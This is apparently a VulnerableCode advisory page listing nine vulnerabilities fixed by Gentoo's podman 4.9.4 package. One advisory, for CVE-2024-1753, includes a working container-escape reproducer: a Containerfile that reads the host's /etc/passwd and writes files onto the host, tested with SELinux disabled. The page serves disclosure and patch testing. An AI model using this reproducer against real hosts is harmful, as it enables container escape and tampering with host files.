VulnerableCode Package Details - pkg:ebuild/app-containers/podman@4.9.4

Vulnerability	Summary	Fixed by
This package is not known to be affected by vulnerabilities.

Vulnerabilities fixed by this package (9)

Vulnerability	Summary	Aliases
VCID-9j8p-hqfn-q7bj	BuildKit vulnerable to possible host system access from mount stub cleaner ### Impact A malicious BuildKit frontend or Dockerfile using `RUN --mount` could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. ### Patches The issue has been fixed in v0.12.5 ### Workarounds Avoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing `RUN --mount` feature. ### References	CVE-2024-23652 GHSA-4v98-7qmw-rqr8
VCID-ba18-6srf-ufbu	BuildKit vulnerable to possible race condition with accessing subpaths from cache mounts ### Impact Two malicious build steps running in parallel sharing the same cache mounts with subpaths could cause a race condition that can lead to files from the host system being accessible to the build container. ### Patches The issue has been fixed in v0.12.5 ### Workarounds Avoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing cache mounts with `--mount=type=cache,source=...` options. ### References https://www.openwall.com/lists/oss-security/2019/05/28/1	CVE-2024-23651 GHSA-m3r6-h7wv-7xxv
VCID-dmsf-7cxm-xff5	Buildkit's interactive containers API does not validate entitlements check ### Impact In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request. ### Patches The issue has been fixed in v0.12.5 . ### Workarounds Avoid using BuildKit frontends from untrusted sources. A frontend image is usually specified as the `#syntax` line on your Dockerfile, or with `--frontend` flag when using `buildctl build` command. ### References	CVE-2024-23653 GHSA-wr6v-9f75-vh2g
VCID-f8ak-21d8-juff	Golang protojson.Unmarshal function infinite loop when unmarshaling certain forms of invalid JSON The protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set.	CVE-2024-24786 GHSA-8r3f-844c-mc37
VCID-gyyv-8fkv-syh5	Podman affected by CVE-2024-1753 container escape at build time ### Impact _What kind of vulnerability is it? Who is impacted?_ Users running containers with root privileges allowing a container to run with read/write access to the host system files when selinux is not enabled. With selinux enabled, some read access is allowed. ### Patches From @nalind . This is a patch for Buildah (https://github.com/containers/buildah). Once fixed there, Buildah will be vendored into Podman. ``` # cat /root/cve-2024-1753.diff --- internal/volumes/volumes.go +++ internal/volumes/volumes.go @@ -11,6 +11,7 @@ import ( "errors" + "github.com/containers/buildah/copier" "github.com/containers/buildah/define" "github.com/containers/buildah/internal" internalParse "github.com/containers/buildah/internal/parse" @@ -189,7 +190,11 @@ func GetBindMount(ctx *types.SystemContext, args []string, contextDir string, st // buildkit parity: support absolute path for sources from current build context if contextDir != "" { // path should be /contextDir/specified path - newMount.Source = filepath.Join(contextDir, filepath.Clean(string(filepath.Separator)+newMount.Source)) + evaluated, err := copier.Eval(contextDir, newMount.Source, copier.EvalOptions{}) + if err != nil { + return newMount, "", err + } + newMount.Source = evaluated } else { // looks like its coming from `build run --mount=type=bind` allow using absolute path // error out if no source is set ``` ### Reproducer Prior to testing, as root, add a memorable username to `/etc/passwd` via adduser or your favorite editor. Also create a memorably named file in `/`. Suggest: `touch /SHOULDNTSEETHIS.txt` and `adduser SHOULDNTSEETHIS`. After testing, remember to remove both the file and the user from your system. Use the following Containerfile ``` # cat ~/cve_Containerfile FROM alpine as base RUN ln -s / /rootdir RUN ln -s /etc /etc2 FROM alpine RUN echo "ls container root" RUN ls -l / RUN echo "With exploit show host root, not the container's root, and create /BIND_BREAKOUT in / on the host" RUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit RUN echo "With exploit show host /etc/passwd, not the container's, and create /BIND_BREAKOUT2 in /etc on the host" RUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2 ``` #### To Test ##### Testing with an older version of Podman with the issue ``` setenforce 0 podman build -f ~/cve_Containerfile . ``` As part of the printout from the build, you should be able to see the contents of the `/' and `/etc` directories, including the `/SHOULDNOTSEETHIS.txt` file that you created, and the contents of the `/etc/passwd` file which will include the `SHOULDNOTSEETHIS` user that you created. In addition, the file `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT2` will exist on the host after the command is completed. Be sure to remove those two files between tests. ``` podman rm -a podman rmi -a rm /BIND_BREAKOUT rm /etc/BIND_BREAKOUT2 setenforce 1 podman build -f ~/cve_Containerfile . ``` Neither the `/BIND_BREAKEOUT` or `/etc/BIND_BREAKOUT2` files should be created. An error should be raised during the build when both files are trying to be created. Also, errors will be raised when the build tries to display the contents of the `/etc/passwd` file, and nothing will be displayed from that file. However, the files in both the `/` and `/etc` directories on the host system will be displayed. ##### Testing with the patch Use the same commands as testing with an older version of Podman. When running using the patched version of Podman, regardless of the `setenforce` settings, you should not see the file that you created or the user that you added. Also the `/BIND_BREAKOUT` and the `/etc/BIND_BREAKOUT` will not exist on the host after the test completes. NOTE: With the fix, the contents of the `/` and `/etc` directories, and the `/etc/passwd` file will be displayed, however, it will be the file and contents from the container image, and NOT the host system. Also the `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT` files will be created in the container image. ### Workarounds Ensure selinux controls are in place to avoid compromising sensitive system files and systems. With "setenforce 0" set, which is not at all advised, the root file system is open for modification with this exploit. With "setenfoce 1" set, which is the recommendation, files can not be changed. However, the contents of the `/` directory can be displayed. I.e., `ls -alF /` will show the contents of the host directory. ### References Unknown.	CVE-2024-1753 GHSA-874v-pj72-92f3
VCID-gzfd-vguv-dqa1	Podman Time-of-check Time-of-use (TOCTOU) Race Condition A Time-of-check Time-of-use (TOCTOU) flaw was found in podman. This issue may allow a malicious user to replace a normal file in a volume with a symlink while exporting the volume, allowing for access to arbitrary files on the host file system.	CVE-2023-0778 GHSA-qwqv-rqgf-8qh8
VCID-jzn6-bzzf-nugp	Improper Validation of Integrity Check Value The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.	CVE-2023-48795 GHSA-45x7-px36-x8w8
VCID-mzjw-b6mh-nugs	Exposure of Sensitive Information to an Unauthorized Actor and Origin Validation Error in podman A flaw was found in podman. The `podman machine` function (used to create and manage Podman virtual machine containing a Podman process) spawns a `gvproxy` process on the host system. The `gvproxy` API is accessible on port 7777 on all IP addresses on the host. If that port is open on the host's firewall, an attacker can potentially use the `gvproxy` API to forward ports on the host to ports in the VM, making private services on the VM accessible to the network. This issue could be also used to interrupt the host's services by forwarding all ports to the VM.	CVE-2021-4024 GHSA-3cf2-x423-x582
VCID-ttsj-3bd1-tfhu	Podman's incorrect handling of the supplementary groups may lead to data disclosure, modification An incorrect handling of the supplementary groups in the Podman container engine might lead to the sensitive information disclosure or possible data modification if an attacker has direct access to the affected container where supplementary groups are used to set access permissions and is able to execute a binary code in that container.	CVE-2022-2989 GHSA-4wjj-jwc9-2x96

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-04-01T13:14:12.945729+00:00	Gentoo Importer	Fixing	VCID-f8ak-21d8-juff	https://security.gentoo.org/glsa/202407-12	38.0.0
2026-04-01T13:14:12.929090+00:00	Gentoo Importer	Fixing	VCID-dmsf-7cxm-xff5	https://security.gentoo.org/glsa/202407-12	38.0.0
2026-04-01T13:14:12.913277+00:00	Gentoo Importer	Fixing	VCID-9j8p-hqfn-q7bj	https://security.gentoo.org/glsa/202407-12	38.0.0
2026-04-01T13:14:12.897109+00:00	Gentoo Importer	Fixing	VCID-ba18-6srf-ufbu	https://security.gentoo.org/glsa/202407-12	38.0.0
2026-04-01T13:14:12.879646+00:00	Gentoo Importer	Fixing	VCID-gyyv-8fkv-syh5	https://security.gentoo.org/glsa/202407-12	38.0.0
2026-04-01T13:14:12.863386+00:00	Gentoo Importer	Fixing	VCID-jzn6-bzzf-nugp	https://security.gentoo.org/glsa/202407-12	38.0.0
2026-04-01T13:14:12.847108+00:00	Gentoo Importer	Fixing	VCID-gzfd-vguv-dqa1	https://security.gentoo.org/glsa/202407-12	38.0.0
2026-04-01T13:14:12.831926+00:00	Gentoo Importer	Fixing	VCID-ttsj-3bd1-tfhu	https://security.gentoo.org/glsa/202407-12	38.0.0
2026-04-01T13:14:12.815307+00:00	Gentoo Importer	Fixing	VCID-mzjw-b6mh-nugs	https://security.gentoo.org/glsa/202407-12	38.0.0